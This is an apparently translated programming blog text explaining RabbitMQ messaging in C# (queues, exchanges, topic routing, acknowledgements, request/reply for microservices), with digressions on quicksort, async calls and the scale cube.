            var queueResult = RabbitUtilityClass._modelCentralized.QueueDeclare("", false, true, true, null);
            _queueName = queueResult.QueueName;
            RabbitUtilityClass._modelCentralized.BasicQos(0, 1, false);
            QueueingBasicConsumer consumer = new QueueingBasicConsumer(RabbitUtilityClass._modelCentralized);
            string consumerTag = RabbitUtilityClass._modelCentralized.BasicConsume(_queueName, false, consumer);

            Task.Run(() =>
            {
                while (true)
                {
                    var e = (RabbitMQ.Client.Events.BasicDeliverEventArgs)consumer.Queue.Dequeue();
                    string content = Encoding.Default.GetString(e.Body);
                    string messageId = e.BasicProperties.MessageId;
                    string correlationId = e.BasicProperties.CorrelationId;
                    var reply = _cacheRequest[correlationId];
                    reply.ForEach(t => t.Post(jsonSerializer.Deserialize<AdditionServiceClass>(content)));
                    _cacheRequest.TryRemove(correlationId, out reply);
                    RabbitUtilityClass._modelCentralized.BasicAck(e.DeliveryTag, false);
                }
            });
        }

        public static Task<AdditionServiceClass> SendRequest(AdditionServiceClass objRequested)
        {
            var objJson = jsonSerializer.Serialize(objRequested);
            var result = new BufferBlock<AdditionServiceClass>();
            if (_cacheRequest.ContainsKey(objJson))
            {
                _cacheRequest[objJson].Add(result);
                return result.ReceiveAsync((new CancellationTokenSource(30000)).Token);
            }
            _cacheRequest[objJson] = new List<BufferBlock<AdditionServiceClass>>();
            _cacheRequest[objJson].Add(result);
            IBasicProperties basicProperties = _modelCentralized.CreateBasicProperties();
            basicProperties.MessageId = Guid.NewGuid().ToString();
            basicProperties.CorrelationId = objJson;
            basicProperties.ReplyTo = _queueName;
            Task.Run(() =>
            {
                _modelCentralized.BasicPublish(ExchangeName, "", basicProperties, Encoding.Default.GetBytes(objJson));
            });
            return result.ReceiveAsync((new CancellationTokenSource(30000)).Token);
        }
    }

    Most of the code sets up the connection to our message broker (RabbitMQ throughout these examples).

    SendRequest is the function called from our asp.net page; it checks whether the request has already been sent, in which case a Task with our reply is returned via BufferBlock's ReceiveAsync method. This is used to block the request and is saved in a collection used to deliver the reply when RabbitMQ sends it back.

    The static constructor of "RabbitUtilityClass" creates the private queue for awaiting the reply and listens for incoming messages. As in the node.js example, the message properties are used to recognize the call and to populate the right BufferBlock objects, which unblock the pages that made the request. The code looks more complex than the node.js version, but it does its job (it could be improved further, for example by adding error messages with usable details).

    At this link you can find the source code.

    This time I was briefer.


    Continue reading ASP.NET e RabbitMQ (con un po' di Node.js).


              Divide et impera with C# and a message broker   

    This one I want to share. Some time ago we were discussing the simple divide-and-conquer paradigm and its practical application. At its core there is nothing difficult: given a task X, you solve it by splitting it into smaller tasks, and those into smaller ones still, recursively. A real example using this paradigm is the famous quicksort which, having picked a middle value called the pivot, on the first pass moves the elements of the array to be sorted to the left if smaller than the pivot, to the right if larger. Then those two sub-arrays are split again, the first around its own pivot, the second around another; the partitioning starts over, moving elements to one side or the other according to the pivot value, so that at the end of this pass there are four arrays. If the sort is not complete, those four arrays are split into eight smaller ones, each with its own pivot and the required moves... and so on until the array is sorted (more info on the wikipedia page, where the algorithm is also shown graphically). Starting from the sample code on the Wikipedia page, I can build the C# version:

    static List<int> QuickSortSync(List<int> toOrder)
    {
        if (toOrder.Count <= 1)
        {
            return toOrder;
        }
        int pivot_index = toOrder.Count / 2;
        int pivot_value = toOrder[pivot_index];
        var less = new List<int>();
        var greater = new List<int>();
        for (int i = 0; i < toOrder.Count; i++)
        {
            if (i == pivot_index)
            {
                continue;
            }
            if (toOrder[i] < pivot_value)
            {
                less.Add(toOrder[i]);
            }
            else
            {
                greater.Add(toOrder[i]);
            }
        }
        var lessOrdered = QuickSortSync(less);
        var greaterOrdered = QuickSortSync(greater);
        var result = new List<int>();
        result.AddRange(lessOrdered);
        result.Add(pivot_value);
        result.AddRange(greaterOrdered);
        return result;
    }

    Even though it is not optimized, that does not matter for the purpose of this post: it does its dirty job and that is enough. When run, it shows the array of integers before and after sorting:

    To improve this version we could use asynchronous calls and multiple threads: after all, the very first split described above, which returns two arrays, can already be processed by two separate threads, each handling its own sub-array. At the next split we could use more threads. With a multi-core processor available, we would immediately get significant performance gains compared to the single-threaded version above. I have already written at length about the multithreaded approach in this other post of mine, and you can find much more information on this site. Of course, being able to use all the cores of your machine and a multitude of parallel threads always sounds like the cure for every ill. But how far can you push beyond these limits? Threads are not infinite, and neither are the cores of a CPU. Some novices - allow me the term - often think that parallel processing is the panacea for every problem. I have many operations to run in parallel, how do I solve this in code? Easy, a flood of parallel threads - and before the Tasks of .NET Framework 4 and the async/await of Framework 4.5, this looked like one of the easiest techniques to use, and perhaps also the most abused. On a first reading, the newcomer often gets the following question wrong:

    Suppose we have a single-core CPU (to keep things simple), and a program of ours takes exactly 40 seconds to carry out N operations. If I modified this program to use 4 parallel threads, how long would it now take to run the whole workload?

    If you answer hastily, you might say 10 seconds. If you know how a CPU and its cores work and you did not let the question fool you, you will have answered correctly: ~40 seconds! The computing power of a CPU is what it is, and splitting the work across more threads does not work miracles. Only with 4 cores would the computation finish in 10 seconds.
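The multithreaded split sketched above can be written down concretely. The following is a minimal sketch, not code from the attached solution: the name `QuickSortParallel` and the `maxDepth` parameter are my own additions, the latter to avoid spawning far more Tasks than cores.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;

static class ParallelSortDemo
{
    // Parallel variant of the quicksort above: the two partitions are
    // sorted by two concurrent Tasks. maxDepth limits how deep new
    // Tasks are spawned; below that depth the sort runs sequentially.
    public static List<int> QuickSortParallel(List<int> toOrder, int maxDepth = 3)
    {
        if (toOrder.Count <= 1)
        {
            return toOrder;
        }
        int pivotIndex = toOrder.Count / 2;
        int pivotValue = toOrder[pivotIndex];
        var less = new List<int>();
        var greater = new List<int>();
        for (int i = 0; i < toOrder.Count; i++)
        {
            if (i == pivotIndex) continue;
            if (toOrder[i] < pivotValue) less.Add(toOrder[i]);
            else greater.Add(toOrder[i]);
        }
        List<int> lessOrdered, greaterOrdered;
        if (maxDepth > 0)
        {
            // Each partition is handled by its own Task, recursively.
            var taskLess = Task.Run(() => QuickSortParallel(less, maxDepth - 1));
            var taskGreater = Task.Run(() => QuickSortParallel(greater, maxDepth - 1));
            Task.WaitAll(taskLess, taskGreater);
            lessOrdered = taskLess.Result;
            greaterOrdered = taskGreater.Result;
        }
        else
        {
            lessOrdered = QuickSortParallel(less, 0);
            greaterOrdered = QuickSortParallel(greater, 0);
        }
        var result = new List<int>(toOrder.Count);
        result.AddRange(lessOrdered);
        result.Add(pivotValue);
        result.AddRange(greaterOrdered);
        return result;
    }
}
```

On a single core this runs in roughly the same time as the sequential version, which is exactly the point of the quiz above; the Tasks only pay off when more cores are available.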

    But why this digression? Because if we wanted to push the divide-et-impera paradigm of the little sorting program above even further, so that it could, in theory, overcome the limits of the machine (CPU and memory), which road could we - I repeat, could we - take? The solution is easy to guess: add another machine to share the work; still not enough? We can add as many machines, and as much computing power, as the job requires.

    To solve these kinds of problems, and to be able to scale a project almost indefinitely, splitting a process into microservices is one of the most popular solutions, as is knowing the famous scale cube by Martin L. Abbott and Michael T. Fisher.

    Setting aside the little sorting program and extending the discussion to applications of a certain weight, let us define a small web application that acts as a blog: a list of posts, the detail of a single post, a search feature and the use of tags. At its base we have a database where the posts are stored, and then a web application with the classic 3 layers: presentation, business logic and data access. In the cube, this kind of application sits at the bottom-left corner. It is a monolithic application, where all the functions live inside a single process. If we wanted to move along the X axis, we would duplicate this web application across multiple processes and servers. The advantages would be immediately obvious: if the application became successful and the hardware of the machine it runs on were no longer sufficient, installing it on more servers would absorb the increased workload (leaving aside scaling the database). The Y axis of the cube is the most interesting one: along it we move the various functions of the web application into small independent modules. Staying with the blog example, we could keep the presentation layer on the web server but split the business logic into several independent modules; the presentation layer would then query one of these modules to request the list of posts and, as soon as it receives the reply, return the requested data to the client. This alone shows a considerable advantage: in an IT world increasingly devoted to event-driven and asynchronous programming - just look at the remarkable success of Node.js, towards which more or less everyone is moving in some form, while async/await is by now part of the everyday life of the .NET programmer - where nothing must be wasted and no thread must sit waiting, this approach allows optimal loading of the servers.
    I am in a quiz mood: what is "wrong" (note the quotes) with the following code (in C#)?

    var posts = BizEntity.GetPostList();
    var tags = BizEntity.GetTagList();

    Come on, it is two lines of code, what could possibly be wrong with them? Hypothetically, the first fetches the list of posts of a blog from the database, while the second fetches the list of tags (this code could be useful for the web application seen above). The first list is used to display the long list of posts of our blog, the second to show the tags in use. If you have already shifted your mindset towards writing asynchronous code, or if you use Node.js, you will have understood what is wrong with these two lines: they simply execute two requests sequentially! The thread reaches the first line and blocks there waiting for the database reply; once it has the reply, it executes a second request and waits again. Why not fire both requests in parallel instead and free the thread while waiting for the replies? In C#:

    var taskPost = BizEntity.GetPostListAsync();
    var taskTag = BizEntity.GetTagListAsync();
    Task.WaitAll(new Task[] { taskPost, taskTag });
    var posts = taskPost.Result;
    var tags = taskTag.Result;

    Great, this is what we wanted: parallel execution of the two requests.
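One caveat: Task.WaitAll still blocks the calling thread until both tasks finish; to truly free the thread, in an async context, you would await Task.WhenAll instead. A minimal sketch of that variant follows; the two async methods are stand-ins for the hypothetical BizEntity calls of the snippet, simulated here with Task.Delay.

```csharp
using System;
using System.Collections.Generic;
using System.Threading.Tasks;

static class WhenAllDemo
{
    // Stand-ins (my own, not from the post's solution) for the
    // hypothetical BizEntity.GetPostListAsync / GetTagListAsync.
    static async Task<List<string>> GetPostListAsync()
    {
        await Task.Delay(50);
        return new List<string> { "post1", "post2" };
    }

    static async Task<List<string>> GetTagListAsync()
    {
        await Task.Delay(50);
        return new List<string> { "tag1" };
    }

    // Both calls start immediately; await Task.WhenAll suspends this
    // method without blocking the calling thread until both complete.
    public static async Task<(int posts, int tags)> LoadAsync()
    {
        var taskPost = GetPostListAsync();
        var taskTag = GetTagListAsync();
        await Task.WhenAll(taskPost, taskTag);
        return (taskPost.Result.Count, taskTag.Result.Count);
    }
}
```

The total wait is roughly one delay, not two, because the tasks run concurrently from the moment they are created.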

    Back to the blog example: suppose at this point we want to add the ability to comment on the posts of our blog. With the monolithic application described at the beginning, we would have to touch the code of the entire project, whereas with the split into smaller independent modules - microservices, precisely - we would write an independent module to install on one or more servers (remember the X axis) and then wire up the other modules that need this data. Finally, the Z axis gives us yet another dimension: we can partition data and functions so that the requests can be split, for example, by the year or month a post was published, by category, and so on... You did not think that all the pages Google has archived and searches through sit on a single replicated server, did you?

    Having explained the famous scale cube in theory (within my limits), it only remains to answer the last question: what glues all these microservices together? The .NET Framework provides good technology for communication between processes, whether they are on the same machine, on a battery of servers in a farm, or remote and communicating over the internet. With WCF you can easily switch between standard WSDL web services and faster communication over TCP, and so on. This approach, though, has an obvious limit, because these communications are direct: suppose one machine hosts the presentation layer of the blog; to request the posts from the microservice running on a second server, it must first of all know WHERE that service is (IP address) and HOW to talk to it. Once that problem is solved in a simple way (saving the IP of the second machine in web.config, for example, and using a shared interface for the communication), we immediately face another one: how can we move along the X axis of the cube, adding more machines running the same microservice, so that the requests are balanced automatically? We would have to keep the caller constantly up to date about the number of machines providing the service it needs, with notifications of planned or unplanned outages: server maintenance taking the service offline, or a sudden hardware failure. In the example above, the presentation layer would have to contain the logic to manage all of this... and so would every microservice of our application... Far too complicated and unmanageable. So why not delegate this job to an external component such as a message broker?

    Azure offers its Microsoft Azure Service Bus, very efficient and a great fit if you use Microsoft's cloud; personally, my preference goes to RabbitMQ, not least because it is the only one I have worked with in depth. First of all, RabbitMQ is a complete open source message broker that supports every kind of protocol (from AMQP https://en.wikipedia.org/wiki/Advanced_Message_Queuing_Protocol to STOMP https://en.wikipedia.org/wiki/Streaming_Text_Oriented_Messaging_Protocol) and, above all, it has clients for almost every technology: the .NET Framework, Java, Node.js and so on. It can also be installed as a server on the main operating systems: Windows, Linux and Apple. If you want to experiment without installing anything on your development machine, you can rely on some free (and limited) services available on the internet. Currently CloudAMQP (https://www.cloudamqp.com/) offers, among its plans, a free tier with a limit of 1,000,000 messages per month:

    For very demanding scenarios there are also clustered plans handling hundreds of thousands of messages per second, but for simple tests the free tier is more than enough. Once registered, you get a complete RabbitMQ service with all the access parameters, available both via REST API and from a classic web page:

    (The user and password shown here are not real.)

    Clicking the orange "RabbitMQ management interface" button opens the full control panel for any configuration you may need, such as creating queues and exchanges (optional, because all of this can also be done from code):

    If you prefer not to use a public service, you can download the version for your operating system directly from the RabbitMQ site:


    With the Windows version, every time I have had to install it I have run into a problem starting the service. To check that everything works, open the Start menu, select "RabbitMQ Command Prompt" and type the command:

    rabbitmqctl.bat status

    If the reply is a long JSON document, everything is fine; otherwise you will see errors about the RabbitMQ node failing to start and the like. In those cases the first step is to compare the content of the cookies created by Erlang (installed together with RabbitMQ); the first is at the path:


    The second:


    If they are identical and the problem persists, from the same terminal started as administrator, run these three commands one after the other:

    rabbitmq-service remove
    rabbitmq-service install
    net start rabbitmq

    If even that does not work, all that is left is to turn to Saint Google. If we want the web interface to be available in the locally installed version, we have to run these commands:

    rabbitmq-plugins enable rabbitmq_management
    rabbitmqctl stop
    rabbitmq-service start

    Now you can open a browser and reach the web interface at:


    Username: guest, password: guest.

    Now, whether you used a free service on the internet or installed everything on your own machine, as a simple test you can go to the Queues tab and create a new queue, into which you can insert and read messages directly from this interface. OK, but what are queues and exchanges? In RabbitMQ (and in any other message broker) there are three main components:

    • The exchange, which receives messages and routes them to a queue; this component is optional.
    • The queue, which is the actual queue where messages are stored.
    • The binding, which links an exchange to a queue.

    As said above, once a queue is created you can insert messages into it and read them from code. That is all. Nothing complicated. A queue can have several properties, the main ones being:

    • Durability: we can have RabbitMQ save the messages to disk, so that if the machine restarts, a queue still waiting to be processed is not lost.
    • Auto-delete: a queue can be deleted automatically as soon as all the connections attached to it are closed.
    • Exclusive: the queue accepts only one process as its consumer, but anyone can add elements to it.

    As written above, from code we can connect directly to a queue and send messages, and other processes can pick them up and process them. The real strength of message brokers does not stop here, of course. Using an exchange lets us write rules for delivering messages to the queues attached through the corresponding bindings. An exchange gives us four delivery modes:

    • Direct: by setting an exact routing key, our message is delivered to that and only that queue bound to the exchange with that binding, as in the figure below:
    • Topic: wildcard characters can be used in the routing key of the binding, so that a message is delivered to one or more queues matching the topic. A simple example: an exchange can be bound to several queues; suppose there are two, both bound with the routing key #.message; sending a message in topic mode with either of the routing keys a1.message or qwerty.message, both queues would receive it.
    • Headers: instead of the routing key, the header fields of the message are checked.
    • Fanout: every bound queue receives the message.

    Another detail not to be underestimated when using message brokers is the guarantee of delivery and receipt of messages. While a lost log entry may be minor and tolerable (because of a machine restart or any external cause), losing a transaction for a booking or a payment causes serious trouble. RabbitMQ supports message acknowledgement: RabbitMQ delivers the message to one of our processes for handling, but does not remove it from the queue until that process sends a command confirming the deletion. If, in the meantime, the process dies and its connection to the message broker drops, the message will be delivered to the next available process.
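The redelivery behaviour just described can be captured in a tiny in-memory model. To be clear, this is not RabbitMQ code: `AckQueue` and its members are invented names used only to illustrate the ack semantics (deliver, ack, requeue on connection drop).

```csharp
using System;
using System.Collections.Generic;

// Toy in-memory model (not RabbitMQ code) of acknowledgement semantics:
// a delivered but unacknowledged message goes back to the queue when the
// consumer's "connection" drops, and is delivered again later.
class AckQueue
{
    private readonly Queue<string> _ready = new Queue<string>();
    private readonly Dictionary<ulong, string> _unacked = new Dictionary<ulong, string>();
    private ulong _tag;

    public void Publish(string message) => _ready.Enqueue(message);

    // Returns the message plus a delivery tag, like a BasicDeliver event.
    public (ulong tag, string message) Deliver()
    {
        var msg = _ready.Dequeue();
        _unacked[++_tag] = msg;
        return (_tag, msg);
    }

    // Removes the message for good, like BasicAck.
    public void Ack(ulong tag) => _unacked.Remove(tag);

    // Simulates a consumer dying: its unacked message is requeued.
    public void ConnectionDropped(ulong tag)
    {
        if (_unacked.TryGetValue(tag, out var msg))
        {
            _unacked.Remove(tag);
            _ready.Enqueue(msg);
        }
    }

    public int ReadyCount => _ready.Count;
}
```

The key point the model shows: with manual acks, a crash between delivery and ack never loses the message, it only delays it.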

    As a simple test from the interface, go to the "Queues" section and create a new queue named "TestQueue":

    Clicking "Add queue", our new queue appears in the list on the page. You could also change the durability and the other queue properties mentioned above, but you can leave everything as it is and move on. Now create an exchange from the "Exchanges" section, named "ExchangeTest" and with type "Direct":

    Now let us bind the exchange to the queue created earlier. In the table on the same page you will notice our exchange has appeared. Clicking on it, we can now define the binding:

    If everything is correct, a new image will show the binding.

    Now, on the same page, open the "Publish message" section, enter the routing key defined above and some test text. Then click "Publish message":

    If everything went well, a message on a green background confirms that the message has been delivered to the queue. To verify, go to the "Queues" section and you will see that the queue now holds one message:

    In the lower part of the page, under "Get Message", you can read and delete the message.

    OK, all nice and simple... but what if I wanted to do it from code? The simplest communication style is one-way. Here one process sends a message to a queue and another process reads it (in the attached solution these are the projects Test1A and Test1B). First of all, you need to add a reference to the RabbitMQ.Client library, available on NuGet. So here is the code that waits for messages on the queue (the code automatically creates the queue Example1, and in the solution linked at the end of this post the project is named Example1A); first of all, the code that reads and drains the queue:

    const string QueueName = "Example1";

    static void Main(string[] args)
    {
        var connectionFactory = new ConnectionFactory();
        connectionFactory.HostName = "localhost";
        using (var Connection = connectionFactory.CreateConnection())
        {
            var ModelCentralized = Connection.CreateModel();
            ModelCentralized.QueueDeclare(QueueName, false, true, false, null);
            QueueingBasicConsumer consumer = new QueueingBasicConsumer(ModelCentralized);
            string consumerTag = ModelCentralized.BasicConsume(QueueName, true, consumer);
            Console.WriteLine("Wait incoming message...");
            while (true)
            {
                var e = (RabbitMQ.Client.Events.BasicDeliverEventArgs)consumer.Queue.Dequeue();
                string content = Encoding.Default.GetString(e.Body);
                Console.WriteLine("> {0}", content);
                if (content == "10")
                {
                    break;
                }
            }
        }
    }

    ConnectionFactory lets us create the connection to our RabbitMQ server (localhost in this example; the guest username and password are used automatically). In the QueueDeclare call the queue name is specified, and the three boolean values that follow state whether the queue is durable (messages are saved to disk and recovered after a restart), exclusive (only the creator of the queue can read its content) and autoDelete (the queue is deleted when the last connection to it is closed). Finally, the consumer object's Dequeue call blocks the process thread, waiting for queue content; when the first message arrives, it takes the content (this .NET client returns a byte array), converts it to a string and prints it on screen.

    The sending code (Example1B):

    // Code identical to the previous example omitted,
    // up to the ModelCentralized instance:
    var ModelCentralized = Connection.CreateModel();
    Console.WriteLine("Send messages...");
    IBasicProperties basicProperties = ModelCentralized.CreateBasicProperties();
    byte[] msgRaw;
    for (int i = 0; i < 11; i++)
    {
        msgRaw = Encoding.Default.GetBytes(i.ToString());
        ModelCentralized.BasicPublish("", QueueName, basicProperties, msgRaw);
    }
    Console.Write("Enter to exit... ");
    Console.ReadLine();

    The rest of the code instantiates the objects needed to send the messages (without setting any particular property); once our message is converted into a byte array, the BasicPublish call actually sends it to the queue QueueName (the first parameter, an empty string, is the name of the exchange to use, if any; here, sending the message directly to the queue, no exchange is needed). The code sends a sequence of numbers to the queue, and if after running it you check the web application seen earlier, you will see that the queue "Example1" contains 11 messages.

    The result:

    Let us introduce the exchange by sending messages through a private queue. We also configure the queue so that we are the ones sending the message acknowledgement. The code gets only slightly more complex for the console application waiting for messages (Example2A).

    // Define the exchange name:
    const string ExchangeName = "ExchangeExample2";
    // The queue name is no longer needed, because the queue is created
    // dynamically with a random name by RabbitMQ.
    // The code is the same as before up to the ModelCentralized instance:
    var ModelCentralized = Connection.CreateModel();
    string QueueName = ModelCentralized.QueueDeclare("", false, true, true, null);
    ModelCentralized.ExchangeDeclare(ExchangeName, ExchangeType.Fanout);
    ModelCentralized.QueueBind(QueueName, ExchangeName, "");
    QueueingBasicConsumer consumer = new QueueingBasicConsumer(ModelCentralized);
    string consumerTag = ModelCentralized.BasicConsume(QueueName, false, consumer);
    // The rest of the code, waiting for messages and printing them, is unchanged.

    In the QueueDeclare call the name is left empty because RabbitMQ will assign a random one for us. Its name does not matter for receiving messages, because another process, to send us messages, will use the name of the exchange. ExchangeDeclare does exactly that: it creates an exchange, if it does not already exist, and QueueBind ties the queue to the exchange. The exchange is also declared as Fanout: any queue bound to it will receive every message sent. There is one difference between this code and the previous one: now it is up to us to tell RabbitMQ that we have received and processed the message, and we do it with this code:

    string consumerTag = ModelCentralized.BasicConsume(QueueName, false, consumer);

    With the second parameter, false, we tell the system that we will send the acknowledgement ourselves, which is completed by the following line:

    ModelCentralized.BasicAck(e.DeliveryTag, false);

    Sending the messages does not change much compared to before; only the publish call changes:

    ModelCentralized.BasicPublish(ExchangeName, "", basicProperties, msgRaw);

    Here the exchange name is specified instead of the queue name. Starting the two processes, the result is the same as before. But now we can start two instances of the first program and see that the messages are received by both:

    We can start as many instances as we want: all of them will receive our messages.

    Besides the Fanout mode seen above, an exchange also offers the Topic mode, in which we can specify that the binding between an exchange and one or more queues goes through routing keys with wildcard characters. There are two wildcards: * and #. But they do not allow the freedom you might imagine. A mistake novices can make is to think that the wildcards must be used when sending messages. That is wrong: they must be used when defining the exchange bindings. The message sent must always carry a valid (or empty) routing key. First of all, routing keys must be defined as words separated by dots. Example:


    If we define two routing keys binding an exchange to two queues like this:

    basso.*.maschile
    *.marroni.*

    And we send messages with these routing keys:

    basso.azzurri.maschile
    alto.marroni.femminile
    alto.azzurri.femminile
    basso.marroni.maschile
    azzurri.maschile

    The first is delivered only to the first queue, the second only to the second queue, the third to neither, the fourth to both. The last, not being made of three words, matches nothing and is dropped.

    Besides the asterisk we can use the hash character (#):


    The difference is that the asterisk matches exactly one word, while the hash is a full wildcard and matches any word, or any number of words, in its place. The rule above would accept:

    basso.azzurri.maschile
    marroni.maschile
    magro.alto.marroni.maschile
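The matching rule for * and # can be pinned down with a small sketch. This is not code from the RabbitMQ client, just the semantics of topic bindings expressed as a function, with the class and method names being my own:

```csharp
using System;

static class TopicMatch
{
    // Sketch of topic-binding semantics: '*' matches exactly one word,
    // '#' matches zero or more words. Words are separated by dots.
    public static bool Matches(string pattern, string routingKey)
    {
        return Match(pattern.Split('.'), 0, routingKey.Split('.'), 0);
    }

    private static bool Match(string[] p, int pi, string[] k, int ki)
    {
        if (pi == p.Length) return ki == k.Length;
        if (p[pi] == "#")
        {
            // '#' can swallow zero or more words of the routing key.
            for (int skip = ki; skip <= k.Length; skip++)
            {
                if (Match(p, pi + 1, k, skip)) return true;
            }
            return false;
        }
        if (ki == k.Length) return false;
        if (p[pi] == "*" || p[pi] == k[ki])
        {
            return Match(p, pi + 1, k, ki + 1);
        }
        return false;
    }
}
```

Running it against the examples above reproduces the deliveries described: basso.*.maschile accepts basso.azzurri.maschile but not the two-word azzurri.maschile, while #.maschile accepts both marroni.maschile and magro.alto.marroni.maschile.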

    The example "Example3A" starts two threads with two different routing keys. The code is the same as in the previous examples except for these two lines:

    ModelCentralized.ExchangeDeclare(_exchangeName, ExchangeType.Topic);
    ModelCentralized.QueueBind(QueueName, _exchangeName, _routingKey);

    In the first we specify that the exchange type is Topic; in the second, besides the queue name and the exchange name, we also pass the following routing keys:

    *.red
    small.*

    The sending code is the same as in the previous examples except for these calls:

    ModelCentralized.BasicPublish(ExchangeName, "small.red", basicProperties, msgRaw);
    ModelCentralized.BasicPublish(ExchangeName, "big.red", basicProperties, msgRaw);
    ...

    Here is the output screen:

    So far the focus has been on sending messages in almost all their facets - only the direct exchange remains, which we will see in the next example, and the headers mode, which I will not cover - now it is time to move in the opposite direction and pay more attention to how messages are read from the queue. With fanout and topic messages we saw that we can send messages to several queues at once, each with a single process attached... what if we attached several processes to a single queue? Here we are at the most interesting point of using message brokers. When the queue receives the messages, it distributes them among all the connected processes:

    Here we can see the fair distribution of all the messages among all the processes. Sending the messages is nothing new compared to what we have seen so far: we use the exchange name (in direct mode) and a routing key (not mandatory); with the message in msgRaw, sending is simple:

    ModelCentralized.BasicPublish(ExchangeName, RoutingKey, basicProperties, msgRaw);

    There is some novelty in the queue-reading example (Example4A in the downloadable project). The names of the queue, the exchange and the routing key are defined:

    const string ExchangeName = "ExchangeExample4";
    const string RoutingKey = "RoutingExample4";
    const string QueueName = "QueueExample4";

    ... and once connected in the usual way:

    var ModelCentralized = Connection.CreateModel();
    ModelCentralized.QueueDeclare(QueueName, false, false, true, null);
    ModelCentralized.ExchangeDeclare(ExchangeName, ExchangeType.Direct);
    ModelCentralized.QueueBind(QueueName, ExchangeName, RoutingKey);
    ModelCentralized.BasicQos(0, 1, false);

    In the queue declaration we have now specified the name: not durable, not exclusive, but with auto-delete. The exchange is declared as Direct. The novelty is the call to "BasicQos". Here we specify that each process will read one and only one message at a time. Reading the messages works the same way:

    var e = (RabbitMQ.Client.Events.BasicDeliverEventArgs)consumer.Queue.Dequeue();

    After this parade of RabbitMQ's possibilities, having seen both sending and receiving messages, it is time to come back down to earth with real examples. A process that sends a message and another, completely independent, that picks it from the queue and displays it is fine only in demos and walkthroughs: at most it can be useful for sending log messages and little else. In the real world a process calls another to request data. The request/reply pattern is what we need. To recreate it with RabbitMQ, based on the examples seen so far, we must first create a public queue to which the requests are sent. And here is the problem: how can the service reply to the process that requested the data? The solution is simple: the requesting process must have its own queue where the replies are deposited. So far we have not gone into the details of the messages received and sent through RabbitMQ. We can set several properties that are useful when processing the communication. Here is the sending code seen so far, with some additional properties:

    IBasicProperties basicProperties = ModelCentralized.CreateBasicProperties();
    basicProperties.MessageId = ...
    basicProperties.ReplyTo = ...;
    msgRaw = Encoding.Default.GetBytes(...);
    ModelCentralized.BasicPublish(ExchangeName, "", basicProperties, msgRaw);

    MessageId and ReplyTo are two freely usable string properties. It is easy to guess how they can be used: ReplyTo can carry the queue of the requesting process. And MessageId? We can use it to specify which request we are replying to. In the examples "Example5A" and "Example5B" we put everything said so far into practice. "Example5A" is the process that will process our data, in this case a trivial arithmetic addition. The most important part is the one that waits for the request and sends the reply:

    var e = (RabbitMQ.Client.Events.BasicDeliverEventArgs)consumer.Queue.Dequeue();
    IBasicProperties props = e.BasicProperties;
    string replyQueue = props.ReplyTo;
    string messageId = props.MessageId;
    string content = Encoding.Default.GetString(e.Body);
    Console.WriteLine("> {0}", content);
    int result = GetSum(content);
    Console.WriteLine("< {0}", result);
    var msgRaw = Encoding.Default.GetBytes(result.ToString());
    IBasicProperties basicProperties = ModelCentralized.CreateBasicProperties();
    basicProperties.MessageId = messageId;
    ModelCentralized.BasicPublish("", replyQueue, basicProperties, msgRaw);
    ModelCentralized.BasicAck(e.DeliveryTag, false);

    In this code we take the name of the requester's queue and the MessageId identifying the call. Using a new IBasicProperties object (we could have reused the same one, but this way the usage is clearer), we set the MessageId property and send the reply to the queue name taken from the request.

    Nothing too complicated so far. The trickier part is the process that calls this service, because at the same time it must create its own private, exclusive queue and send the requests to the public queue. Since a synchronous call is not an option (and it would be absurd), I will use two threads: one sending the requests and a second one for the replies. To track the requests we use a dictionary holding the MessageId and the request:

    messageBuffers = new Dictionary<string, string>();
    messageBuffers.Add("a1", "2+2");
    messageBuffers.Add("a2", "3+3");
    messageBuffers.Add("a3", "4+4");

    Then the fictitious name of the private queue, to which the service will send the replies, is defined:

    QueueName = Guid.NewGuid().ToString();

    Sending the requests looks like this (as already seen):

    foreach (KeyValuePair<string, string> item in messageBuffers)
    {
        IBasicProperties basicProperties = ModelCentralized.CreateBasicProperties();
        basicProperties.MessageId = item.Key;             // a1, a2, a3
        basicProperties.ReplyTo = QueueName;
        msgRaw = Encoding.Default.GetBytes(item.Value);   // 2+2, 3+3, 4+4
        ModelCentralized.BasicPublish(ExchangeName, "", basicProperties, msgRaw);
    }

    And now the thread for the replies:

    while (true)
    {
        var e = (RabbitMQ.Client.Events.BasicDeliverEventArgs)consumer.Queue.Dequeue();
        string content = Encoding.Default.GetString(e.Body);
        string messageId = e.BasicProperties.MessageId;
        Console.WriteLine("{0} = {1}", messageBuffers[messageId], content);
        ModelCentralized.BasicAck(e.DeliveryTag, false);
    }

    Very simple: once the reply sent by RabbitMQ is read, we read the MessageId, use it to look up the text of the original request, and pair it with the correct reply (here only for display purposes).

    In this case too we can start several processes waiting to be called. A process can run on the same machine, or it could be on the other side of the planet: the only rule for it to answer a request is that it be reachable and connected to RabbitMQ. At this point it is easy to see the potential of this approach: a message broker at the center and one or more machines connected to it, running dozens of micro services, each responsible for one or more functions. Nothing prevents us from putting, next to the sum function shown above, a service that returns the list of products for an e-commerce site. We can create another micro service to manage users and their shopping carts. And the nice part is that we can install them on the same machine or spread them across a web farm with dozens of servers. Moreover, as demand grows, we can install the same micro service on several servers (remember the axes of the cube?).
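The MessageId/ReplyTo correlation mechanism described above can be sketched without a broker at all. Below is a minimal, runnable in-process illustration in Python (chosen here only because it is easy to run standalone); plain queues stand in for the RabbitMQ public and private queues, and every name is illustrative:

```python
import queue

# The public queue and the caller's private queue are simulated with plain
# in-process queues; message_buffers maps MessageId -> request text exactly
# as in the article's dictionary. All names are illustrative.

requests_q = queue.Queue()   # stands in for the public queue
reply_q = queue.Queue()      # stands in for the caller's private queue

message_buffers = {"a1": "2+2", "a2": "3+3", "a3": "4+4"}

# the caller: tags every request with its MessageId and a reply queue
for msg_id, expr in message_buffers.items():
    requests_q.put({"message_id": msg_id, "reply_to": reply_q, "body": expr})

# the worker: computes the sum and replies, echoing the MessageId back
while not requests_q.empty():
    req = requests_q.get()
    a, b = req["body"].split("+")
    req["reply_to"].put({"message_id": req["message_id"],
                         "body": str(int(a) + int(b))})

# the caller again: pairs each reply with its original request via the id
results = {}
while not reply_q.empty():
    rep = reply_q.get()
    results[message_buffers[rep["message_id"]]] = rep["body"]

print(results)
```

The essential point survives the simplification: the worker never needs to know who asked; it only echoes the id and writes to whatever queue the request named.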

